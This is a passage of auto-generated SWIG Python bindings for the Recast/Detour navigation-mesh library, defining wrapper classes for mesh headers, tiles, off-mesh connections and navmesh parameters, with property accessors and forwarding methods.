def __init__(self):
this = _pyrecast.new_dtOffMeshConnection()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtOffMeshConnection
__del__ = lambda self : None;
dtOffMeshConnection_swigregister = _pyrecast.dtOffMeshConnection_swigregister
dtOffMeshConnection_swigregister(dtOffMeshConnection)
class dtMeshHeader(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtMeshHeader, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtMeshHeader, name)
__repr__ = _swig_repr
__swig_setmethods__["magic"] = _pyrecast.dtMeshHeader_magic_set
__swig_getmethods__["magic"] = _pyrecast.dtMeshHeader_magic_get
if _newclass:magic = _swig_property(_pyrecast.dtMeshHeader_magic_get, _pyrecast.dtMeshHeader_magic_set)
__swig_setmethods__["version"] = _pyrecast.dtMeshHeader_version_set
__swig_getmethods__["version"] = _pyrecast.dtMeshHeader_version_get
if _newclass:version = _swig_property(_pyrecast.dtMeshHeader_version_get, _pyrecast.dtMeshHeader_version_set)
__swig_setmethods__["x"] = _pyrecast.dtMeshHeader_x_set
__swig_getmethods__["x"] = _pyrecast.dtMeshHeader_x_get
if _newclass:x = _swig_property(_pyrecast.dtMeshHeader_x_get, _pyrecast.dtMeshHeader_x_set)
__swig_setmethods__["y"] = _pyrecast.dtMeshHeader_y_set
__swig_getmethods__["y"] = _pyrecast.dtMeshHeader_y_get
if _newclass:y = _swig_property(_pyrecast.dtMeshHeader_y_get, _pyrecast.dtMeshHeader_y_set)
__swig_setmethods__["layer"] = _pyrecast.dtMeshHeader_layer_set
__swig_getmethods__["layer"] = _pyrecast.dtMeshHeader_layer_get
if _newclass:layer = _swig_property(_pyrecast.dtMeshHeader_layer_get, _pyrecast.dtMeshHeader_layer_set)
__swig_setmethods__["userId"] = _pyrecast.dtMeshHeader_userId_set
__swig_getmethods__["userId"] = _pyrecast.dtMeshHeader_userId_get
if _newclass:userId = _swig_property(_pyrecast.dtMeshHeader_userId_get, _pyrecast.dtMeshHeader_userId_set)
__swig_setmethods__["polyCount"] = _pyrecast.dtMeshHeader_polyCount_set
__swig_getmethods__["polyCount"] = _pyrecast.dtMeshHeader_polyCount_get
if _newclass:polyCount = _swig_property(_pyrecast.dtMeshHeader_polyCount_get, _pyrecast.dtMeshHeader_polyCount_set)
__swig_setmethods__["vertCount"] = _pyrecast.dtMeshHeader_vertCount_set
__swig_getmethods__["vertCount"] = _pyrecast.dtMeshHeader_vertCount_get
if _newclass:vertCount = _swig_property(_pyrecast.dtMeshHeader_vertCount_get, _pyrecast.dtMeshHeader_vertCount_set)
__swig_setmethods__["maxLinkCount"] = _pyrecast.dtMeshHeader_maxLinkCount_set
__swig_getmethods__["maxLinkCount"] = _pyrecast.dtMeshHeader_maxLinkCount_get
if _newclass:maxLinkCount = _swig_property(_pyrecast.dtMeshHeader_maxLinkCount_get, _pyrecast.dtMeshHeader_maxLinkCount_set)
__swig_setmethods__["detailMeshCount"] = _pyrecast.dtMeshHeader_detailMeshCount_set
__swig_getmethods__["detailMeshCount"] = _pyrecast.dtMeshHeader_detailMeshCount_get
if _newclass:detailMeshCount = _swig_property(_pyrecast.dtMeshHeader_detailMeshCount_get, _pyrecast.dtMeshHeader_detailMeshCount_set)
__swig_setmethods__["detailVertCount"] = _pyrecast.dtMeshHeader_detailVertCount_set
__swig_getmethods__["detailVertCount"] = _pyrecast.dtMeshHeader_detailVertCount_get
if _newclass:detailVertCount = _swig_property(_pyrecast.dtMeshHeader_detailVertCount_get, _pyrecast.dtMeshHeader_detailVertCount_set)
__swig_setmethods__["detailTriCount"] = _pyrecast.dtMeshHeader_detailTriCount_set
__swig_getmethods__["detailTriCount"] = _pyrecast.dtMeshHeader_detailTriCount_get
if _newclass:detailTriCount = _swig_property(_pyrecast.dtMeshHeader_detailTriCount_get, _pyrecast.dtMeshHeader_detailTriCount_set)
__swig_setmethods__["bvNodeCount"] = _pyrecast.dtMeshHeader_bvNodeCount_set
__swig_getmethods__["bvNodeCount"] = _pyrecast.dtMeshHeader_bvNodeCount_get
if _newclass:bvNodeCount = _swig_property(_pyrecast.dtMeshHeader_bvNodeCount_get, _pyrecast.dtMeshHeader_bvNodeCount_set)
__swig_setmethods__["offMeshConCount"] = _pyrecast.dtMeshHeader_offMeshConCount_set
__swig_getmethods__["offMeshConCount"] = _pyrecast.dtMeshHeader_offMeshConCount_get
if _newclass:offMeshConCount = _swig_property(_pyrecast.dtMeshHeader_offMeshConCount_get, _pyrecast.dtMeshHeader_offMeshConCount_set)
__swig_setmethods__["offMeshBase"] = _pyrecast.dtMeshHeader_offMeshBase_set
__swig_getmethods__["offMeshBase"] = _pyrecast.dtMeshHeader_offMeshBase_get
if _newclass:offMeshBase = _swig_property(_pyrecast.dtMeshHeader_offMeshBase_get, _pyrecast.dtMeshHeader_offMeshBase_set)
__swig_setmethods__["walkableHeight"] = _pyrecast.dtMeshHeader_walkableHeight_set
__swig_getmethods__["walkableHeight"] = _pyrecast.dtMeshHeader_walkableHeight_get
if _newclass:walkableHeight = _swig_property(_pyrecast.dtMeshHeader_walkableHeight_get, _pyrecast.dtMeshHeader_walkableHeight_set)
__swig_setmethods__["walkableRadius"] = _pyrecast.dtMeshHeader_walkableRadius_set
__swig_getmethods__["walkableRadius"] = _pyrecast.dtMeshHeader_walkableRadius_get
if _newclass:walkableRadius = _swig_property(_pyrecast.dtMeshHeader_walkableRadius_get, _pyrecast.dtMeshHeader_walkableRadius_set)
__swig_setmethods__["walkableClimb"] = _pyrecast.dtMeshHeader_walkableClimb_set
__swig_getmethods__["walkableClimb"] = _pyrecast.dtMeshHeader_walkableClimb_get
if _newclass:walkableClimb = _swig_property(_pyrecast.dtMeshHeader_walkableClimb_get, _pyrecast.dtMeshHeader_walkableClimb_set)
__swig_setmethods__["bmin"] = _pyrecast.dtMeshHeader_bmin_set
__swig_getmethods__["bmin"] = _pyrecast.dtMeshHeader_bmin_get
if _newclass:bmin = _swig_property(_pyrecast.dtMeshHeader_bmin_get, _pyrecast.dtMeshHeader_bmin_set)
__swig_setmethods__["bmax"] = _pyrecast.dtMeshHeader_bmax_set
__swig_getmethods__["bmax"] = _pyrecast.dtMeshHeader_bmax_get
if _newclass:bmax = _swig_property(_pyrecast.dtMeshHeader_bmax_get, _pyrecast.dtMeshHeader_bmax_set)
__swig_setmethods__["bvQuantFactor"] = _pyrecast.dtMeshHeader_bvQuantFactor_set
__swig_getmethods__["bvQuantFactor"] = _pyrecast.dtMeshHeader_bvQuantFactor_get
if _newclass:bvQuantFactor = _swig_property(_pyrecast.dtMeshHeader_bvQuantFactor_get, _pyrecast.dtMeshHeader_bvQuantFactor_set)
def __init__(self):
this = _pyrecast.new_dtMeshHeader()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtMeshHeader
__del__ = lambda self : None;
dtMeshHeader_swigregister = _pyrecast.dtMeshHeader_swigregister
dtMeshHeader_swigregister(dtMeshHeader)
class dtMeshTile(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtMeshTile, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtMeshTile, name)
__repr__ = _swig_repr
__swig_setmethods__["salt"] = _pyrecast.dtMeshTile_salt_set
__swig_getmethods__["salt"] = _pyrecast.dtMeshTile_salt_get
if _newclass:salt = _swig_property(_pyrecast.dtMeshTile_salt_get, _pyrecast.dtMeshTile_salt_set)
__swig_setmethods__["linksFreeList"] = _pyrecast.dtMeshTile_linksFreeList_set
__swig_getmethods__["linksFreeList"] = _pyrecast.dtMeshTile_linksFreeList_get
if _newclass:linksFreeList = _swig_property(_pyrecast.dtMeshTile_linksFreeList_get, _pyrecast.dtMeshTile_linksFreeList_set)
__swig_setmethods__["header"] = _pyrecast.dtMeshTile_header_set
__swig_getmethods__["header"] = _pyrecast.dtMeshTile_header_get
if _newclass:header = _swig_property(_pyrecast.dtMeshTile_header_get, _pyrecast.dtMeshTile_header_set)
__swig_setmethods__["polys"] = _pyrecast.dtMeshTile_polys_set
__swig_getmethods__["polys"] = _pyrecast.dtMeshTile_polys_get
if _newclass:polys = _swig_property(_pyrecast.dtMeshTile_polys_get, _pyrecast.dtMeshTile_polys_set)
__swig_setmethods__["verts"] = _pyrecast.dtMeshTile_verts_set
__swig_getmethods__["verts"] = _pyrecast.dtMeshTile_verts_get
if _newclass:verts = _swig_property(_pyrecast.dtMeshTile_verts_get, _pyrecast.dtMeshTile_verts_set)
__swig_setmethods__["links"] = _pyrecast.dtMeshTile_links_set
__swig_getmethods__["links"] = _pyrecast.dtMeshTile_links_get
if _newclass:links = _swig_property(_pyrecast.dtMeshTile_links_get, _pyrecast.dtMeshTile_links_set)
__swig_setmethods__["detailMeshes"] = _pyrecast.dtMeshTile_detailMeshes_set
__swig_getmethods__["detailMeshes"] = _pyrecast.dtMeshTile_detailMeshes_get
if _newclass:detailMeshes = _swig_property(_pyrecast.dtMeshTile_detailMeshes_get, _pyrecast.dtMeshTile_detailMeshes_set)
__swig_setmethods__["detailVerts"] = _pyrecast.dtMeshTile_detailVerts_set
__swig_getmethods__["detailVerts"] = _pyrecast.dtMeshTile_detailVerts_get
if _newclass:detailVerts = _swig_property(_pyrecast.dtMeshTile_detailVerts_get, _pyrecast.dtMeshTile_detailVerts_set)
__swig_setmethods__["detailTris"] = _pyrecast.dtMeshTile_detailTris_set
__swig_getmethods__["detailTris"] = _pyrecast.dtMeshTile_detailTris_get
if _newclass:detailTris = _swig_property(_pyrecast.dtMeshTile_detailTris_get, _pyrecast.dtMeshTile_detailTris_set)
__swig_setmethods__["bvTree"] = _pyrecast.dtMeshTile_bvTree_set
__swig_getmethods__["bvTree"] = _pyrecast.dtMeshTile_bvTree_get
if _newclass:bvTree = _swig_property(_pyrecast.dtMeshTile_bvTree_get, _pyrecast.dtMeshTile_bvTree_set)
__swig_setmethods__["offMeshCons"] = _pyrecast.dtMeshTile_offMeshCons_set
__swig_getmethods__["offMeshCons"] = _pyrecast.dtMeshTile_offMeshCons_get
if _newclass:offMeshCons = _swig_property(_pyrecast.dtMeshTile_offMeshCons_get, _pyrecast.dtMeshTile_offMeshCons_set)
__swig_setmethods__["data"] = _pyrecast.dtMeshTile_data_set
__swig_getmethods__["data"] = _pyrecast.dtMeshTile_data_get
if _newclass:data = _swig_property(_pyrecast.dtMeshTile_data_get, _pyrecast.dtMeshTile_data_set)
__swig_setmethods__["dataSize"] = _pyrecast.dtMeshTile_dataSize_set
__swig_getmethods__["dataSize"] = _pyrecast.dtMeshTile_dataSize_get
if _newclass:dataSize = _swig_property(_pyrecast.dtMeshTile_dataSize_get, _pyrecast.dtMeshTile_dataSize_set)
__swig_setmethods__["flags"] = _pyrecast.dtMeshTile_flags_set
__swig_getmethods__["flags"] = _pyrecast.dtMeshTile_flags_get
if _newclass:flags = _swig_property(_pyrecast.dtMeshTile_flags_get, _pyrecast.dtMeshTile_flags_set)
__swig_setmethods__["next"] = _pyrecast.dtMeshTile_next_set
__swig_getmethods__["next"] = _pyrecast.dtMeshTile_next_get
if _newclass:next = _swig_property(_pyrecast.dtMeshTile_next_get, _pyrecast.dtMeshTile_next_set)
def __init__(self):
this = _pyrecast.new_dtMeshTile()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtMeshTile
__del__ = lambda self : None;
dtMeshTile_swigregister = _pyrecast.dtMeshTile_swigregister
dtMeshTile_swigregister(dtMeshTile)
class dtNavMeshParams(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtNavMeshParams, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtNavMeshParams, name)
__repr__ = _swig_repr
__swig_setmethods__["orig"] = _pyrecast.dtNavMeshParams_orig_set
__swig_getmethods__["orig"] = _pyrecast.dtNavMeshParams_orig_get
if _newclass:orig = _swig_property(_pyrecast.dtNavMeshParams_orig_get, _pyrecast.dtNavMeshParams_orig_set)
__swig_setmethods__["tileWidth"] = _pyrecast.dtNavMeshParams_tileWidth_set
__swig_getmethods__["tileWidth"] = _pyrecast.dtNavMeshParams_tileWidth_get
if _newclass:tileWidth = _swig_property(_pyrecast.dtNavMeshParams_tileWidth_get, _pyrecast.dtNavMeshParams_tileWidth_set)
__swig_setmethods__["tileHeight"] = _pyrecast.dtNavMeshParams_tileHeight_set
__swig_getmethods__["tileHeight"] = _pyrecast.dtNavMeshParams_tileHeight_get
if _newclass:tileHeight = _swig_property(_pyrecast.dtNavMeshParams_tileHeight_get, _pyrecast.dtNavMeshParams_tileHeight_set)
__swig_setmethods__["maxTiles"] = _pyrecast.dtNavMeshParams_maxTiles_set
__swig_getmethods__["maxTiles"] = _pyrecast.dtNavMeshParams_maxTiles_get
if _newclass:maxTiles = _swig_property(_pyrecast.dtNavMeshParams_maxTiles_get, _pyrecast.dtNavMeshParams_maxTiles_set)
__swig_setmethods__["maxPolys"] = _pyrecast.dtNavMeshParams_maxPolys_set
__swig_getmethods__["maxPolys"] = _pyrecast.dtNavMeshParams_maxPolys_get
if _newclass:maxPolys = _swig_property(_pyrecast.dtNavMeshParams_maxPolys_get, _pyrecast.dtNavMeshParams_maxPolys_set)
def __init__(self):
this = _pyrecast.new_dtNavMeshParams()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtNavMeshParams
__del__ = lambda self : None;
dtNavMeshParams_swigregister = _pyrecast.dtNavMeshParams_swigregister
dtNavMeshParams_swigregister(dtNavMeshParams)
class dtNavMesh(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtNavMesh, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtNavMesh, name)
__repr__ = _swig_repr
def __init__(self):
this = _pyrecast.new_dtNavMesh()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtNavMesh
__del__ = lambda self : None;
def init(self, *args): return _pyrecast.dtNavMesh_init(self, *args)
def getParams(self): return _pyrecast.dtNavMesh_getParams(self)
def addTile(self, *args): return _pyrecast.dtNavMesh_addTile(self, *args)
def removeTile(self, *args): return _pyrecast.dtNavMesh_removeTile(self, *args)
def calcTileLoc(self, *args): return _pyrecast.dtNavMesh_calcTileLoc(self, *args)
def getTileAt(self, *args): return _pyrecast.dtNavMesh_getTileAt(self, *args)
def getTileRefAt(self, *args): return _pyrecast.dtNavMesh_getTileRefAt(self, *args)
def getTileRef(self, *args): return _pyrecast.dtNavMesh_getTileRef(self, *args)
def getTileByRef(self, *args): return _pyrecast.dtNavMesh_getTileByRef(self, *args)
def getMaxTiles(self): return _pyrecast.dtNavMesh_getMaxTiles(self)
def getTileAndPolyByRef(self, *args): return _pyrecast.dtNavMesh_getTileAndPolyByRef(self, *args)
def getTileAndPolyByRefUnsafe(self, *args): return _pyrecast.dtNavMesh_getTileAndPolyByRefUnsafe(self, *args)
def isValidPolyRef(self, *args): return _pyrecast.dtNavMesh_isValidPolyRef(self, *args)
def getPolyRefBase(self, *args): return _pyrecast.dtNavMesh_getPolyRefBase(self, *args)
def getOffMeshConnectionPolyEndPoints(self, *args): return _pyrecast.dtNavMesh_getOffMeshConnectionPolyEndPoints(self, *args)
def getOffMeshConnectionByRef(self, *args): return _pyrecast.dtNavMesh_getOffMeshConnectionByRef(self, *args)
def setPolyFlags(self, *args): return _pyrecast.dtNavMesh_setPolyFlags(self, *args)
def getPolyFlags(self, *args): return _pyrecast.dtNavMesh_getPolyFlags(self, *args)
def setPolyArea(self, *args): return _pyrecast.dtNavMesh_setPolyArea(self, *args)
def getPolyArea(self, *args): return _pyrecast.dtNavMesh_getPolyArea(self, *args)
def getTileStateSize(self, *args): return _pyrecast.dtNavMesh_getTileStateSize(self, *args)
def storeTileState(self, *args): return _pyrecast.dtNavMesh_storeTileState(self, *args)
def restoreTileState(self, *args): return _pyrecast.dtNavMesh_restoreTileState(self, *args)
def encodePolyId(self, *args): return _pyrecast.dtNavMesh_encodePolyId(self, *args)
def decodePolyId(self, *args): return _pyrecast.dtNavMesh_decodePolyId(self, *args)
def decodePolyIdSalt(self, *args): return _pyrecast.dtNavMesh_decodePolyIdSalt(self, *args)
def decodePolyIdTile(self, *args): return _pyrecast.dtNavMesh_decodePolyIdTile(self, *args)
def decodePolyIdPoly(self, *args): return _pyrecast.dtNavMesh_decodePolyIdPoly(self, *args)
def getTile(self, *args): return _pyrecast.dtNavMesh_getTile(self, *args)
def getTilesAt(self, *args): return _pyrecast.dtNavMesh_getTilesAt(self, *args)
def getNeighbourTilesAt(self, *args): return _pyrecast.dtNavMesh_getNeighbourTilesAt(self, *args)
def findConnectingPolys(self, *args): return _pyrecast.dtNavMesh_findConnectingPolys(self, *args)
def connectIntLinks(self, *args): return _pyrecast.dtNavMesh_connectIntLinks(self, *args)
def baseOffMeshLinks(self, *args): return _pyrecast.dtNavMesh_baseOffMeshLinks(self, *args)
def connectExtLinks(self, *args): return _pyrecast.dtNavMesh_connectExtLinks(self, *args)
def connectExtOffMeshLinks(self, *args): return _pyrecast.dtNavMesh_connectExtOffMeshLinks(self, *args)
def unconnectExtLinks(self, *args): return _pyrecast.dtNavMesh_unconnectExtLinks(self, *args)
def queryPolygonsInTile(self, *args): return _pyrecast.dtNavMesh_queryPolygonsInTile(self, *args)
def findNearestPolyInTile(self, *args): return _pyrecast.dtNavMesh_findNearestPolyInTile(self, *args)
def closestPointOnPolyInTile(self, *args): return _pyrecast.dtNavMesh_closestPointOnPolyInTile(self, *args)
__swig_setmethods__["m_params"] = _pyrecast.dtNavMesh_m_params_set
__swig_getmethods__["m_params"] = _pyrecast.dtNavMesh_m_params_get
if _newclass:m_params = _swig_property(_pyrecast.dtNavMesh_m_params_get, _pyrecast.dtNavMesh_m_params_set)
__swig_setmethods__["m_orig"] = _pyrecast.dtNavMesh_m_orig_set
__swig_getmethods__["m_orig"] = _pyrecast.dtNavMesh_m_orig_get
if _newclass:m_orig = _swig_property(_pyrecast.dtNavMesh_m_orig_get, _pyrecast.dtNavMesh_m_orig_set)
__swig_setmethods__["m_tileWidth"] = _pyrecast.dtNavMesh_m_tileWidth_set
__swig_getmethods__["m_tileWidth"] = _pyrecast.dtNavMesh_m_tileWidth_get
if _newclass:m_tileWidth = _swig_property(_pyrecast.dtNavMesh_m_tileWidth_get, _pyrecast.dtNavMesh_m_tileWidth_set)
__swig_setmethods__["m_tileHeight"] = _pyrecast.dtNavMesh_m_tileHeight_set
__swig_getmethods__["m_tileHeight"] = _pyrecast.dtNavMesh_m_tileHeight_get
if _newclass:m_tileHeight = _swig_property(_pyrecast.dtNavMesh_m_tileHeight_get, _pyrecast.dtNavMesh_m_tileHeight_set)
__swig_setmethods__["m_maxTiles"] = _pyrecast.dtNavMesh_m_maxTiles_set
__swig_getmethods__["m_maxTiles"] = _pyrecast.dtNavMesh_m_maxTiles_get
if _newclass:m_maxTiles = _swig_property(_pyrecast.dtNavMesh_m_maxTiles_get, _pyrecast.dtNavMesh_m_maxTiles_set)
__swig_setmethods__["m_tileLutSize"] = _pyrecast.dtNavMesh_m_tileLutSize_set
__swig_getmethods__["m_tileLutSize"] = _pyrecast.dtNavMesh_m_tileLutSize_get
if _newclass:m_tileLutSize = _swig_property(_pyrecast.dtNavMesh_m_tileLutSize_get, _pyrecast.dtNavMesh_m_tileLutSize_set)
__swig_setmethods__["m_tileLutMask"] = _pyrecast.dtNavMesh_m_tileLutMask_set
__swig_getmethods__["m_tileLutMask"] = _pyrecast.dtNavMesh_m_tileLutMask_get
if _newclass:m_tileLutMask = _swig_property(_pyrecast.dtNavMesh_m_tileLutMask_get, _pyrecast.dtNavMesh_m_tileLutMask_set)
__swig_setmethods__["m_posLookup"] = _pyrecast.dtNavMesh_m_posLookup_set
__swig_getmethods__["m_posLookup"] = _pyrecast.dtNavMesh_m_posLookup_get
if _newclass:m_posLookup = _swig_property(_pyrecast.dtNavMesh_m_posLookup_get, _pyrecast.dtNavMesh_m_posLookup_set)
__swig_setmethods__["m_nextFree"] = _pyrecast.dtNavMesh_m_nextFree_set
__swig_getmethods__["m_nextFree"] = _pyrecast.dtNavMesh_m_nextFree_get
if _newclass:m_nextFree = _swig_property(_pyrecast.dtNavMesh_m_nextFree_get, _pyrecast.dtNavMesh_m_nextFree_set)
__swig_setmethods__["m_tiles"] = _pyrecast.dtNavMesh_m_tiles_set
__swig_getmethods__["m_tiles"] = _pyrecast.dtNavMesh_m_tiles_get
if _newclass:m_tiles = _swig_property(_pyrecast.dtNavMesh_m_tiles_get, _pyrecast.dtNavMesh_m_tiles_set)
__swig_setmethods__["m_saltBits"] = _pyrecast.dtNavMesh_m_saltBits_set
__swig_getmethods__["m_saltBits"] = _pyrecast.dtNavMesh_m_saltBits_get
if _newclass:m_saltBits = _swig_property(_pyrecast.dtNavMesh_m_saltBits_get, _pyrecast.dtNavMesh_m_saltBits_set)
__swig_setmethods__["m_tileBits"] = _pyrecast.dtNavMesh_m_tileBits_set
__swig_getmethods__["m_tileBits"] = _pyrecast.dtNavMesh_m_tileBits_get
if _newclass:m_tileBits = _swig_property(_pyrecast.dtNavMesh_m_tileBits_get, _pyrecast.dtNavMesh_m_tileBits_set)
__swig_setmethods__["m_polyBits"] = _pyrecast.dtNavMesh_m_polyBits_set
__swig_getmethods__["m_polyBits"] = _pyrecast.dtNavMesh_m_polyBits_get
if _newclass:m_polyBits = _swig_property(_pyrecast.dtNavMesh_m_polyBits_get, _pyrecast.dtNavMesh_m_polyBits_set)
dtNavMesh_swigregister = _pyrecast.dtNavMesh_swigregister
dtNavMesh_swigregister(dtNavMesh)
def dtAllocNavMesh():
return _pyrecast.dtAllocNavMesh()
dtAllocNavMesh = _pyrecast.dtAllocNavMesh
def dtFreeNavMesh(*args):
return _pyrecast.dtFreeNavMesh(*args)
dtFreeNavMesh = _pyrecast.dtFreeNavMesh
class dtNavMeshCreateParams(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtNavMeshCreateParams, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtNavMeshCreateParams, name)
__repr__ = _swig_repr
__swig_setmethods__["verts"] = _pyrecast.dtNavMeshCreateParams_verts_set
__swig_getmethods__["verts"] = _pyrecast.dtNavMeshCreateParams_verts_get
if _newclass:verts = _swig_property(_pyrecast.dtNavMeshCreateParams_verts_get, _pyrecast.dtNavMeshCreateParams_verts_set)
__swig_setmethods__["vertCount"] = _pyrecast.dtNavMeshCreateParams_vertCount_set
__swig_getmethods__["vertCount"] = _pyrecast.dtNavMeshCreateParams_vertCount_get
if _newclass:vertCount = _swig_property(_pyrecast.dtNavMeshCreateParams_vertCount_get, _pyrecast.dtNavMeshCreateParams_vertCount_set)
__swig_setmethods__["polys"] = _pyrecast.dtNavMeshCreateParams_polys_set
__swig_getmethods__["polys"] = _pyrecast.dtNavMeshCreateParams_polys_get
if _newclass:polys = _swig_property(_pyrecast.dtNavMeshCreateParams_polys_get, _pyrecast.dtNavMeshCreateParams_polys_set)
__swig_setmethods__["polyFlags"] = _pyrecast.dtNavMeshCreateParams_polyFlags_set
__swig_getmethods__["polyFlags"] = _pyrecast.dtNavMeshCreateParams_polyFlags_get
if _newclass:polyFlags = _swig_property(_pyrecast.dtNavMeshCreateParams_polyFlags_get, _pyrecast.dtNavMeshCreateParams_polyFlags_set)
__swig_setmethods__["polyAreas"] = _pyrecast.dtNavMeshCreateParams_polyAreas_set
__swig_getmethods__["polyAreas"] = _pyrecast.dtNavMeshCreateParams_polyAreas_get
if _newclass:polyAreas = _swig_property(_pyrecast.dtNavMeshCreateParams_polyAreas_get, _pyrecast.dtNavMeshCreateParams_polyAreas_set)
__swig_setmethods__["polyCount"] = _pyrecast.dtNavMeshCreateParams_polyCount_set
__swig_getmethods__["polyCount"] = _pyrecast.dtNavMeshCreateParams_polyCount_get
if _newclass:polyCount = _swig_property(_pyrecast.dtNavMeshCreateParams_polyCount_get, _pyrecast.dtNavMeshCreateParams_polyCount_set)
__swig_setmethods__["nvp"] = _pyrecast.dtNavMeshCreateParams_nvp_set
__swig_getmethods__["nvp"] = _pyrecast.dtNavMeshCreateParams_nvp_get
if _newclass:nvp = _swig_property(_pyrecast.dtNavMeshCreateParams_nvp_get, _pyrecast.dtNavMeshCreateParams_nvp_set)
__swig_setmethods__["detailMeshes"] = _pyrecast.dtNavMeshCreateParams_detailMeshes_set
__swig_getmethods__["detailMeshes"] = _pyrecast.dtNavMeshCreateParams_detailMeshes_get
if _newclass:detailMeshes = _swig_property(_pyrecast.dtNavMeshCreateParams_detailMeshes_get, _pyrecast.dtNavMeshCreateParams_detailMeshes_set)
__swig_setmethods__["detailVerts"] = _pyrecast.dtNavMeshCreateParams_detailVerts_set
__swig_getmethods__["detailVerts"] = _pyrecast.dtNavMeshCreateParams_detailVerts_get
if _newclass:detailVerts = _swig_property(_pyrecast.dtNavMeshCreateParams_detailVerts_get, _pyrecast.dtNavMeshCreateParams_detailVerts_set)
__swig_setmethods__["detailVertsCount"] = _pyrecast.dtNavMeshCreateParams_detailVertsCount_set
__swig_getmethods__["detailVertsCount"] = _pyrecast.dtNavMeshCreateParams_detailVertsCount_get
if _newclass:detailVertsCount = _swig_property(_pyrecast.dtNavMeshCreateParams_detailVertsCount_get, _pyrecast.dtNavMeshCreateParams_detailVertsCount_set)
__swig_setmethods__["detailTris"] = _pyrecast.dtNavMeshCreateParams_detailTris_set
__swig_getmethods__["detailTris"] = _pyrecast.dtNavMeshCreateParams_detailTris_get
if _newclass:detailTris = _swig_property(_pyrecast.dtNavMeshCreateParams_detailTris_get, _pyrecast.dtNavMeshCreateParams_detailTris_set)
__swig_setmethods__["detailTriCount"] = _pyrecast.dtNavMeshCreateParams_detailTriCount_set
__swig_getmethods__["detailTriCount"] = _pyrecast.dtNavMeshCreateParams_detailTriCount_get
if _newclass:detailTriCount = _swig_property(_pyrecast.dtNavMeshCreateParams_detailTriCount_get, _pyrecast.dtNavMeshCreateParams_detailTriCount_set)
__swig_setmethods__["offMeshConVerts"] = _pyrecast.dtNavMeshCreateParams_offMeshConVerts_set
__swig_getmethods__["offMeshConVerts"] = _pyrecast.dtNavMeshCreateParams_offMeshConVerts_get
if _newclass:offMeshConVerts = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConVerts_get, _pyrecast.dtNavMeshCreateParams_offMeshConVerts_set)
__swig_setmethods__["offMeshConRad"] = _pyrecast.dtNavMeshCreateParams_offMeshConRad_set
__swig_getmethods__["offMeshConRad"] = _pyrecast.dtNavMeshCreateParams_offMeshConRad_get
if _newclass:offMeshConRad = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConRad_get, _pyrecast.dtNavMeshCreateParams_offMeshConRad_set)
__swig_setmethods__["offMeshConFlags"] = _pyrecast.dtNavMeshCreateParams_offMeshConFlags_set
__swig_getmethods__["offMeshConFlags"] = _pyrecast.dtNavMeshCreateParams_offMeshConFlags_get
if _newclass:offMeshConFlags = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConFlags_get, _pyrecast.dtNavMeshCreateParams_offMeshConFlags_set)
__swig_setmethods__["offMeshConAreas"] = _pyrecast.dtNavMeshCreateParams_offMeshConAreas_set
__swig_getmethods__["offMeshConAreas"] = _pyrecast.dtNavMeshCreateParams_offMeshConAreas_get
if _newclass:offMeshConAreas = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConAreas_get, _pyrecast.dtNavMeshCreateParams_offMeshConAreas_set)
__swig_setmethods__["offMeshConDir"] = _pyrecast.dtNavMeshCreateParams_offMeshConDir_set
__swig_getmethods__["offMeshConDir"] = _pyrecast.dtNavMeshCreateParams_offMeshConDir_get
if _newclass:offMeshConDir = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConDir_get, _pyrecast.dtNavMeshCreateParams_offMeshConDir_set)
__swig_setmethods__["offMeshConUserID"] = _pyrecast.dtNavMeshCreateParams_offMeshConUserID_set
__swig_getmethods__["offMeshConUserID"] = _pyrecast.dtNavMeshCreateParams_offMeshConUserID_get
if _newclass:offMeshConUserID = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConUserID_get, _pyrecast.dtNavMeshCreateParams_offMeshConUserID_set)
__swig_setmethods__["offMeshConCount"] = _pyrecast.dtNavMeshCreateParams_offMeshConCount_set
__swig_getmethods__["offMeshConCount"] = _pyrecast.dtNavMeshCreateParams_offMeshConCount_get
if _newclass:offMeshConCount = _swig_property(_pyrecast.dtNavMeshCreateParams_offMeshConCount_get, _pyrecast.dtNavMeshCreateParams_offMeshConCount_set)
__swig_setmethods__["userId"] = _pyrecast.dtNavMeshCreateParams_userId_set
__swig_getmethods__["userId"] = _pyrecast.dtNavMeshCreateParams_userId_get
if _newclass:userId = _swig_property(_pyrecast.dtNavMeshCreateParams_userId_get, _pyrecast.dtNavMeshCreateParams_userId_set)
__swig_setmethods__["tileX"] = _pyrecast.dtNavMeshCreateParams_tileX_set
__swig_getmethods__["tileX"] = _pyrecast.dtNavMeshCreateParams_tileX_get
if _newclass:tileX = _swig_property(_pyrecast.dtNavMeshCreateParams_tileX_get, _pyrecast.dtNavMeshCreateParams_tileX_set)
__swig_setmethods__["tileY"] = _pyrecast.dtNavMeshCreateParams_tileY_set
__swig_getmethods__["tileY"] = _pyrecast.dtNavMeshCreateParams_tileY_get
if _newclass:tileY = _swig_property(_pyrecast.dtNavMeshCreateParams_tileY_get, _pyrecast.dtNavMeshCreateParams_tileY_set)
__swig_setmethods__["tileLayer"] = _pyrecast.dtNavMeshCreateParams_tileLayer_set
